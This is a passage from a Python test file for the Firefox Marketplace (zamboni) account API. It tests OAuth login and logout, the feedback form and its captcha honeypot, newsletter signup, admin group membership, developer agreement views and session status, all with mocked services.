[installed_app.pk])\n eq_(data['apps']['purchased'], [purchased_app.pk])\n eq_(data['apps']['developed'], [developed_app.pk])\n\n @patch('requests.post')\n def test_login_failure(self, http_request):\n with patch('mkt.account.views.OAuth2Session') as get_session:\n m = get_session()\n m.fetch_token.return_value = {'access_token': 'fake'}\n m.post().json.return_value = {'error': 'busted'}\n res = self.post({'auth_response': 'x',\n 'state': 'y'})\n eq_(res.status_code, 403)\n\n def test_login_empty(self):\n res = self.post({})\n data = json.loads(res.content)\n eq_(res.status_code, 400)\n assert 'auth_response' in data\n assert 'apps' not in data\n\n def test_login_settings(self):\n data = self._test_login()\n eq_(data['settings']['source'], 'firefox-accounts')\n\n @patch.object(uuid, 'uuid4', FakeUUID)\n @patch('requests.post')\n def test_login_sets_has_logged_in(self, http_request):\n state = 'fake-state'\n with patch('mkt.account.views.OAuth2Session') as get_session:\n m = get_session()\n m.fetch_token.return_value = {'access_token': 'fake'}\n m.post().json.return_value = {\n 'user': 'fake-uid',\n 'email': 'cvan@mozilla.com'\n }\n res = self.post({\n 'auth_response': 'https://testserver/?access_token=fake-token&'\n 'code=coed&state=' + state,\n 'state': state})\n ok_('has_logged_in' in res.cookies)\n eq_(res.cookies['has_logged_in'].value, '1')\n\n def test_logout(self):\n data = self._test_login()\n\n r = self.client.delete(\n urlparams(self.logout_url, _user=data['token']),\n content_type='application/json')\n eq_(r.status_code, 204)\n\n\nclass TestFeedbackHandler(TestPotatoCaptcha, RestOAuth):\n\n def setUp(self):\n super(TestFeedbackHandler, self).setUp()\n self.url = reverse('account-feedback')\n self.user = UserProfile.objects.get(pk=2519)\n self.default_data = {\n 'chromeless': 'no',\n 'feedback': u'Hér€ is whàt I rælly think.',\n 'platform': u'Desktøp',\n 'from_url': '/feedback',\n 'sprout': 'potato'\n }\n self.headers = {\n 'HTTP_USER_AGENT': 'Fiiia-fox',\n 'REMOTE_ADDR': '48.151.623.42'\n }\n\n def _call(self, anonymous=False, data=None):\n post_data = self.default_data.copy()\n client = self.anon if anonymous else self.client\n if anonymous:\n post_data['tuber'] = ''\n post_data['sprout'] = 'potato'\n if data:\n post_data.update(data)\n res = client.post(self.url, data=json.dumps(post_data),\n **self.headers)\n return res, json.loads(res.content)\n\n def _test_success(self, res, data):\n eq_(201, res.status_code)\n\n fields = self.default_data.copy()\n\n # PotatoCaptcha field shouldn't be present in returned data.\n del fields['sprout']\n ok_('sprout' not in data)\n\n # Rest of the fields should all be here.\n for name in fields.keys():\n eq_(fields[name], data[name])\n\n eq_(len(mail.outbox), 1)\n assert self.default_data['feedback'] in mail.outbox[0].body\n assert self.headers['REMOTE_ADDR'] in mail.outbox[0].body\n\n def test_send(self):\n res, data = self._call()\n self._test_success(res, data)\n eq_(unicode(self.user), data['user'])\n email = mail.outbox[0]\n eq_(email.from_email, settings.DEFAULT_FROM_EMAIL)\n eq_(email.extra_headers['Reply-To'], self.user.email)\n assert self.user.name in email.body\n assert unicode(self.user.pk) in email.body\n assert self.user.email in email.body\n\n def test_send_urlencode(self):\n self.headers['CONTENT_TYPE'] = 'application/x-www-form-urlencoded'\n post_data = self.default_data.copy()\n res = self.client.post(self.url, data=urlencode(post_data),\n **self.headers)\n data = json.loads(res.content)\n self._test_success(res, data)\n eq_(unicode(self.user), data['user'])\n email = mail.outbox[0]\n eq_(email.from_email, settings.DEFAULT_FROM_EMAIL)\n eq_(email.extra_headers['Reply-To'], self.user.email)\n\n def test_send_without_platform(self):\n del self.default_data['platform']\n self.url += '?dev=platfoo'\n\n res, data = self._call()\n self._test_success(res, data)\n assert 'platfoo' in mail.outbox[0].body\n\n def test_send_anonymous(self):\n res, data = self._call(anonymous=True)\n self._test_success(res, data)\n assert not data.get('user')\n assert 'Anonymous' in mail.outbox[0].body\n eq_(settings.NOBODY_EMAIL, mail.outbox[0].from_email)\n\n def test_send_potato(self):\n tuber_res, tuber_data = self._call(data={'tuber': 'potat-toh'},\n anonymous=True)\n potato_res, potato_data = self._call(data={'sprout': 'potat-toh'},\n anonymous=True)\n self._test_bad_api_potato_data(tuber_res, tuber_data)\n self._test_bad_api_potato_data(potato_res, potato_data)\n\n def test_missing_optional_field(self):\n res, data = self._call(data={'platform': None})\n eq_(201, res.status_code)\n\n def test_send_bad_data(self):\n \"\"\"\n One test to ensure that Feedback API is doing its validation duties.\n \"\"\"\n res, data = self._call(data={'feedback': None})\n eq_(400, res.status_code)\n assert 'feedback' in data\n\n def test_bad_feedback_data(self):\n # test to ensure feedback with only white spaces are not submitted\n res, data = self._call(data={'feedback': ' '})\n eq_(400, res.status_code)\n assert 'feedback' in data\n\n\nclass TestNewsletter(RestOAuth):\n VALID_EMAIL = 'bob@example.com'\n VALID_PLUS_EMAIL = 'bob+totally+real@example.com'\n INVALID_EMAIL = '!not_an_email'\n\n def setUp(self):\n super(TestNewsletter, self).setUp()\n self.url = reverse('account-newsletter')\n\n @patch('basket.subscribe')\n def test_signup_bad(self, subscribe):\n res = self.client.post(self.url,\n data=json.dumps({'email': self.INVALID_EMAIL}))\n eq_(res.status_code, 400)\n ok_(not subscribe.called)\n\n @patch('basket.subscribe')\n def test_signup_empty(self, subscribe):\n res = self.client.post(self.url)\n eq_(res.status_code, 400)\n ok_(not subscribe.called)\n\n @patch('basket.subscribe')\n def test_signup_invalid_newsletter(self, subscribe):\n res = self.client.post(self.url, data={'email': self.VALID_EMAIL,\n 'lang': 'en-US',\n 'newsletter': 'invalid'})\n eq_(res.status_code, 400)\n ok_(not subscribe.called)\n\n @patch('basket.subscribe')\n def test_signup_anonymous(self, subscribe):\n res = self.anon.post(self.url,\n data=json.dumps({'email': self.VALID_EMAIL,\n 'lang': 'en-US'}))\n eq_(res.status_code, 204)\n subscribe.assert_called_with(\n self.VALID_EMAIL, 'marketplace', lang='en-US',\n country='', trigger_welcome='Y', optin='Y', format='H')\n\n @patch('basket.subscribe')\n def test_signup_lang(self, subscribe):\n res = self.anon.post(self.url,\n data=json.dumps({'email': self.VALID_EMAIL,\n 'lang': 'es'}))\n eq_(res.status_code, 204)\n subscribe.assert_called_with(\n self.VALID_EMAIL, 'marketplace', lang='es',\n country='', trigger_welcome='Y', optin='Y', format='H')\n\n @patch('basket.subscribe')\n def test_signup(self, subscribe):\n res = self.client.post(self.url,\n data=json.dumps({'email': self.VALID_EMAIL,\n 'lang': 'en-US'}))\n eq_(res.status_code, 204)\n subscribe.assert_called_with(\n self.VALID_EMAIL, 'marketplace', lang='en-US',\n country='', trigger_welcome='Y', optin='Y', format='H')\n\n @patch('mkt.account.views.NewsletterView.get_region')\n @patch('basket.subscribe')\n def test_signup_us(self, subscribe, get_region):\n get_region.return_value = 'us'\n res = self.client.post(self.url,\n data=json.dumps({'email': self.VALID_EMAIL,\n 'lang': 'en-US'}))\n eq_(res.status_code, 204)\n subscribe.assert_called_with(\n self.VALID_EMAIL, 'marketplace', lang='en-US',\n country='us', trigger_welcome='Y', optin='Y', format='H')\n\n @patch('basket.subscribe')\n def test_signup_plus(self, subscribe):\n res = self.client.post(\n self.url,\n data=json.dumps({'email': self.VALID_PLUS_EMAIL,\n 'lang': 'en-US'}))\n subscribe.assert_called_with(\n self.VALID_PLUS_EMAIL, 'marketplace', lang='en-US',\n country='', trigger_welcome='Y', optin='Y', format='H')\n eq_(res.status_code, 204)\n\n @patch('basket.subscribe')\n def test_signup_about_apps(self, subscribe):\n res = self.client.post(self.url,\n data=json.dumps({'email': self.VALID_EMAIL,\n 'lang': 'en-US',\n 'newsletter': 'about:apps'}))\n eq_(res.status_code, 204)\n subscribe.assert_called_with(\n self.VALID_EMAIL, 'mozilla-and-you,marketplace-desktop',\n lang='en-US', country='', trigger_welcome='Y',\n optin='Y', format='H')\n\n\nclass TestGroupsViewSet(RestOAuth):\n fixtures = fixture('user_2519', 'user_999')\n\n @classmethod\n def setUpTestData(cls):\n cls.target_user = UserProfile.objects.get(pk=999)\n cls.normal_group = Group.objects.create(name=u'NGr\\u00F4up', rules=\"\")\n cls.restricted_group = Group.objects.create(\n name=u'\\u0158Group', rules=\"\", restricted=True)\n cls.url = reverse('account-groups', kwargs={'pk': 999})\n\n def setUp(self):\n super(TestGroupsViewSet, self).setUp()\n self.grant_permission(self.user, 'Admin:%')\n\n def test_has_cors(self):\n self.assertCORS(self.client.get(self.url), 'get', 'delete', 'post')\n\n def test_verbs(self):\n self._allowed_verbs(self.url, ('get', 'delete', 'post'))\n\n def test_anon(self):\n eq_(self.anon.get(self.url).status_code, 403)\n\n def test_non_admin(self):\n self.remove_permission(self.user, 'Admin:%')\n eq_(self.client.get(self.url).status_code, 403)\n\n def test_list(self):\n GroupUser.objects.create(group=self.normal_group,\n user=self.target_user)\n GroupUser.objects.create(group=self.restricted_group,\n user=self.target_user)\n res = self.client.get(self.url)\n eq_(res.status_code, 200, res.content)\n data = json.loads(res.content)\n # Check target has those two groups.\n eq_(data[0]['id'], self.normal_group.pk)\n eq_(data[0]['name'], self.normal_group.name)\n eq_(data[0]['restricted'], self.normal_group.restricted)\n eq_(data[1]['id'], self.restricted_group.pk)\n eq_(data[1]['name'], self.restricted_group.name)\n eq_(data[1]['restricted'], self.restricted_group.restricted)\n\n def test_list_invalid_user_id(self):\n url = reverse('account-groups', kwargs={'pk': 54321})\n eq_(self.client.get(url).status_code, 400)\n\n def do_post(self, group_id):\n return self.client.post(self.url, data=json.dumps({'group': group_id}))\n\n def do_delete(self, group_id):\n return self.client.delete(self.url, data={'group': group_id})\n\n def test_add_group_valid(self):\n res = self.do_post(self.normal_group.pk)\n eq_(res.status_code, 201, res.content)\n\n def test_add_group_fail_admin(self):\n res = self.do_post(self.restricted_group.pk)\n eq_(res.status_code, 400, res.content)\n\n def test_add_group_fail_already_member(self):\n GroupUser.objects.create(group=self.normal_group,\n user=self.target_user)\n res = self.do_post(self.normal_group.pk)\n eq_(res.status_code, 400, res.content)\n\n def test_add_group_fail_no_group(self):\n res = self.do_post(123456)\n eq_(res.status_code, 400, res.content)\n\n def test_remove_group_valid(self):\n GroupUser.objects.create(group=self.normal_group,\n user=self.target_user)\n res = self.do_delete(self.normal_group.pk)\n eq_(res.status_code, 204, res.content)\n\n def test_remove_group_fail_admin(self):\n GroupUser.objects.create(group=self.restricted_group,\n user=self.target_user)\n res = self.do_delete(self.restricted_group.pk)\n eq_(res.status_code, 400, res.content)\n\n def test_remove_group_fail_not_member(self):\n res = self.do_delete(self.normal_group.pk)\n eq_(res.status_code, 400, res.content)\n\n def test_remove_group_fail_no_group(self):\n res = self.do_delete(123456)\n eq_(res.status_code, 400, res.content)\n\n\nclass TestTOSReadView(RestOAuth):\n fixtures = fixture('user_2519')\n\n def setUp(self):\n super(TestTOSReadView, self).setUp()\n self.url = reverse('api-v2:account-devagreement-read')\n self.user = UserProfile.objects.get(pk=2519)\n\n def test_verbs(self):\n self._allowed_verbs(self.url, ('post'))\n\n def test_has_cors(self):\n self.assertCORS(self.client.post(self.url), 'post')\n\n def test_anon(self):\n res = self.anon.post(self.url)\n eq_(res.status_code, 403)\n\n def test_get(self):\n res = self.client.get(self.url)\n eq_(res.status_code, 405)\n\n def test_already_signed(self):\n self.user.update(read_dev_agreement=datetime.now())\n res = self.client.post(self.url)\n eq_(res.status_code, 400)\n\n def test_sign_not_shown(self):\n self.user.update(read_dev_agreement=None, shown_dev_agreement=None)\n eq_(self.user.shown_dev_agreement, None)\n eq_(self.user.read_dev_agreement, None)\n res = self.client.post(self.url)\n eq_(res.status_code, 400)\n\n def test_sign_shown(self):\n self.user.update(read_dev_agreement=None,\n shown_dev_agreement=datetime.now())\n ok_(isinstance(self.user.shown_dev_agreement, datetime))\n eq_(self.user.read_dev_agreement, None)\n res = self.client.post(self.url)\n eq_(res.status_code, 201)\n updated_user = UserProfile.objects.get(pk=self.user.pk)\n ok_(isinstance(updated_user.shown_dev_agreement, datetime))\n ok_(isinstance(updated_user.read_dev_agreement, datetime))\n\n\nclass TestTOSShowView(RestOAuth):\n fixtures = fixture('user_2519')\n\n def setUp(self):\n super(TestTOSShowView, self).setUp()\n self.url = reverse('api-v2:account-devagreement-show')\n self.user = UserProfile.objects.get(pk=2519)\n\n def test_verbs(self):\n self._allowed_verbs(self.url, ('post'))\n\n def test_has_cors(self):\n self.assertCORS(self.client.post(self.url), 'post')\n\n def test_anon(self):\n res = self.anon.post(self.url)\n eq_(res.status_code, 403)\n\n def test_get(self):\n res = self.client.get(self.url)\n eq_(res.status_code, 405)\n\n def test_already_signed(self):\n now = datetime.now()\n self.user.update(shown_dev_agreement=now)\n res = self.client.post(self.url)\n eq_(res.status_code, 200)\n eq_(res.json['url'], reverse('mkt.developers.apps.terms_standalone'))\n\n def test_show_user(self):\n self.user.update(read_dev_agreement=None)\n eq_(self.user.read_dev_agreement, None)\n res = self.client.post(self.url)\n eq_(res.status_code, 201)\n updated_user = UserProfile.objects.get(pk=self.user.pk)\n ok_(isinstance(updated_user.shown_dev_agreement, datetime))\n eq_(res.json['url'], reverse('mkt.developers.apps.terms_standalone'))\n\n\nclass TestUserSessionView(TestCase):\n fixtures = fixture('user_999',)\n\n def setUp(self):\n super(TestUserSessionView, self).setUp()\n self.user = UserProfile.objects.get(email='regular@mozilla.com')\n self.url = reverse('users.session')\n\n def test_no_cors(self):\n response = self.client.get(self.url)\n assert 'Access-Control-Allow-Origin' not in response\n\n def test_no_session(self):\n response = self.client.get(self.url)\n eq_(response.status_code, 200)\n eq_(json.loads(response.content)['has_session'], False)\n\n def test_session(self):\n self.login(self.user.email)\n response = self.client.get(self.url)\n eq_(response.status_code, 200)\n eq_(json.loads(response.content)['has_session'], True)\n","repo_name":"mozilla/zamboni","sub_path":"mkt/account/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":39654,"program_lang":"python","lang":"en","doc_type":"code","stars":476,"dataset":"github-code","pt":"3"}